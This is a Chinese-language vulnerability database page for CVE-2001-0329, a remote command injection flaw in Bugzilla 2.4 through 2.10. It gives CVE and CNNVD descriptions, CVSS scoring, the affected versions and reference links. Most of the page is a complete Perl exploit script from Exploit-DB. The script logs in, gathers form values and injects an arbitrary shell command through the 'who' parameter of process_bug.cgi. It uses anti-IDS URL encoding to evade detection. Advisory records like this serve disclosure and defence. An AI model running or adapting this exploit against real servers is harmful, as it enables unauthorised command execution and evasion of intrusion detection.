CVE-2001-0329
CVSS7.5
发布时间 :2001-06-27 00:00:00
修订时间 :2008-09-10 15:07:46
NMCOE    

[原文]Bugzilla 2.10 allows remote attackers to execute arbitrary commands via shell metacharacters in a username that is then processed by (1) the Bugzilla_login cookie in post_bug.cgi, or (2) the who parameter in process_bug.cgi.


[CNNVD]Bugzilla远程执行任意命令漏洞(CNNVD-200106-140)

        Bugzilla 2.10版本存在漏洞。远程攻击者可以借助用户名中的shell元字符执行任意命令,这些命令由(1)post_bug.cgi中的Bugzilla_login cookie或(2)process_bug.cgi中的who参数处理。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mozilla:bugzilla:2.8Mozilla Bugzilla 2.8
cpe:/a:mozilla:bugzilla:2.10Mozilla Bugzilla 2.10
cpe:/a:mozilla:bugzilla:2.4Mozilla Bugzilla 2.4
cpe:/a:mozilla:bugzilla:2.6Mozilla Bugzilla 2.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0329
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0329
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-140
(官方数据源) CNNVD

- 其它链接及资源

http://www.atstake.com/research/advisories/2001/a043001-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A043001-1
http://www.securityfocus.com/bid/1199
(UNKNOWN)  BID  1199
http://www.mozilla.org/projects/bugzilla/security2_12.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/projects/bugzilla/security2_12.html

- 漏洞信息

Bugzilla远程执行任意命令漏洞
高危 输入验证
2001-06-27 00:00:00 2005-10-20 00:00:00
远程  
        Bugzilla 2.10版本存在漏洞。远程攻击者可以借助用户名中的shell元字符执行任意命令,这些命令由(1)post_bug.cgi中的Bugzilla_login cookie或(2)process_bug.cgi中的who参数处理。

- 公告与补丁

        The vendor has addressed this issue in Bugzilla versions 2.12 and later.
        Mozilla Bugzilla 2.10
        
        Mozilla Bugzilla 2.4
        
        Mozilla Bugzilla 2.6
        
        Mozilla Bugzilla 2.8
        

- 漏洞信息 (19909)

Mozilla Bugzilla 2.4/2.6/2.8/2.10 Remote Arbitrary Command Execution (EDBID:19909)
cgi remote
2000-05-11 Verified
0 Frank van Vliet karin
N/A [点击下载]
source: http://www.securityfocus.com/bid/1199/info

Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them. 

Bugzilla is prone to a vulnerability which may allow remote users to execute arbitrary commands on the target webserver. 

When accepting a bug report, the script "process_bug.cgi" calls "./processmail" via a perl system() call argumented by a number of paramaters with values originating from user input via a web-form. There are no checks against these values for shell metacharacters by the script before insertion into the system() call. 

As a result, it possible for an attacker to supply maliciously crafted input to form fields, which when submitted will cause arbitrary commands to be executed on the shell of the host running vulnerable versions of Bugzilla. Commands will be executed with the privileges of the webserver process.


#!/usr/bin/perl

# Bugzilla 2.8 remote exploit
# by {} - karin@root66.nl.eu.org
# 	RooT66		- http://root66.nl.eu.org
# 	ShellOracle	- http://www.shelloracle.cjb.net
# 	b0f		- http://b0f.freebsd.lublin.pl
# 	
# This exploits uses antiIDS tricks ripped from whisker

# next 2 functinos stolen from whisker, commented by me
sub rstr { # no, this is not a cryptographically-robust number generator
        my $str,$c;
        $drift=(rand() * 10) % 10;
        for($c=0;$c<10+$drift;$c++){
        $str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z
        return $str;}

sub antiIDS {
	($url) = (@_);
        $url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
	$url =~ s/\ /+/g;
        $url =~s/\//\/.\//g;
	return $url;
}
#end of stolen stuff

($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);         

print("Exploit for Bugzilla up to version 2.8\n");
print("        by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66		- http://root66.nl.eu.org\n");
print("ShellOracle	- http://www.shelloracle.cjb.net\n");
print("b0f		- http://b0f.freebsd.lublin.pl\n");
print("\n");

if ($complete_url eq "-h" || $complete_url eq "--help") {
	print("Usage: $0 url emailaddress password command\n");
	exit;
}

# Get information of user
if (!$complete_url) {
	print("URL: ");
	$complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
	print("EMAIL: ");
	$Bugzilla_login = <STDIN>; chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
	print("PASSWORD: ");
	$Bugzilla_password = <STDIN>; chomp($Bugzilla_password);
}
if (!$command) {
	print("COMMAND: ");
	$command = <STDIN>; chomp($command);
}


# Set some variables
$host = $complete_url; $host =~ s/\/.*//;
$base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//;

# Make own directory
system("mkdir $$");

print("Getting information needed to submit our 'bug'\n");
# Get product name
system("cd $$; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") .  "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
	if ($input =~ /enter_bug.cgi\?product=/) {
		chomp($input);
		$product = $input;
		$product =~ s/.*product=//;
		$product =~ s/".*//;
		if ($product =~ /\&component=/) {
			$component = $product;
			$product =~ s/&.*//;		# strip component
			$component =~ s/.*component=//;
			$component =~ s/".*//;
		}
	}
}
print("\tProduct: $product\n");
if ($component) {
	print("\tComponent: $component\n");
	}
# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password");
system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
	chomp($input);
	if ($input =~ /Reporter:/) {
		$reporter = $input;
		$reporter =~ s/.*Reporter: //;
		$reporter =~ s/\ .*//;
	}
	if ($input =~ /Version:/) {
		$version = $input;
		$version =~ s/.*Version: \[//;
		$version =~ s/\.*\].*//;
	}
	if ($input =~ /Component:/) {
		$component = $input;
		$component =~ s/.*Component: \[//;
		$component =~ s/\.*\].*//;
	}
	if ($input =~ /Platform:/) {
		$platform = $input;
		$platform =~ s/.*Platform: \[//;
		$platform =~ s/\.*\].*//;
	}
	if ($input =~ /OS:/) {
		$os = $input;
		$os =~ s/.*OS: \[//;
		$os =~ s/\.*\].*//;
	}
	if ($input =~ /Priority:/) {
		$priority = $input;
		$priority =~ s/.*Priority: \[//;
		$priority =~ s/\].*//;
	}
	if ($input =~ /Severity:/) {
		$severity = $input;
		$severity =~ s/.*Severity: \[//;
		$severity =~ s/\.*\].*//;
	}
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);


#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") .  "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi");	
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
	chomp($input);
	if ($input =~ /END OUTPUT COMMAND/) {
		$startoutput = 0;
	}
	if ($startoutput) {
		print("$input\n");
	}
	if ($input =~ /START OUTPUT COMMAND/) {
	$startoutput = 1;
	}
}
close(FILE);
# Delete shit
# system("rm -rf $$");
		

- 漏洞信息

6364
Bugzilla post_bug.cgi Bugzilla_login Cookie Arbitrary Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-05-11 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站